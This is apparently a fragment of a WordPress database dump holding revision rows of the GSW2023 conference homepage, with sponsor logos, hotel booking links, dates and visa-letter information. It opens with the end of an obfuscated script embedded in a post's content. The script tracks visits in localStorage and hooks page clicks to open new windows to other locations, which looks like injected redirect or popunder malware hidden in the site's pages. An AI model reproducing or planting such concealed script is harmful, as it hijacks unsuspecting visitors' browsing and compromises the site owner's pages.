_0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:09:04','2023-06-09 22:09:04','',3066,'https://gsw2023.com/?p=4671',0,'revision','',0),
(4672,1,'2023-06-09 22:09:46','2023-06-09 22:09:46','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686348506627{margin-top: 180px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" 